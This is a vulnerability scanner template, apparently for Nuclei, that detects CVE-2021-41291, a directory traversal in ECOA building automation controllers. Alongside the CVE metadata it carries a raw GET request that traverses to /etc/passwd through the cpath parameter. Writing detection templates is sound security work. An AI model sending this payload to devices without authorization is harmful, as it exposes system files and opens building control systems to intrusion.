2021-10-14 14:38:44 +00:00
id : CVE-2021-41291
2021-09-24 23:58:58 +00:00
info :
name : ECOA Building Automation System - Directory Traversal Content Disclosure
author : gy741
severity : high
2022-05-17 09:18:12 +00:00
description : The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System.
2021-10-14 14:20:43 +00:00
reference :
2022-03-06 17:04:24 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-41291
2021-10-14 12:59:38 +00:00
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
2022-05-17 09:18:12 +00:00
- https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html
2021-10-14 14:40:51 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-10-14 14:40:51 +00:00
cve-id : CVE-2021-41291
cwe-id : CWE-22
2023-10-14 11:27:55 +00:00
epss-score : 0.0476
2023-11-16 10:31:49 +00:00
epss-percentile : 0.91807
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : ecoa
product : ecs_router_controller-ecs_firmware
tags : cve,cve2021,ecoa,lfi,traversal
2021-09-24 23:58:58 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-24 23:58:58 +00:00
- raw :
- |
2021-09-25 05:52:48 +00:00
GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
2021-09-24 23:58:58 +00:00
Host : {{Hostname}}
matchers :
2021-09-25 05:52:48 +00:00
- type : regex
regex :
2022-01-04 19:34:16 +00:00
- "root:.*:0:0:"
2023-11-16 11:11:46 +00:00
# digest: 4a0a00473045022100bf2fbf43a4e88af1c2272ea59e9d7332d11b62b3c5caabcbb6ad0fb230c10ae302206a5894e038eb46dc459e46b25755033cfab33c98f721fe3e44e384ce6dccbd21:922c64590222798bb761d5b6d8e72950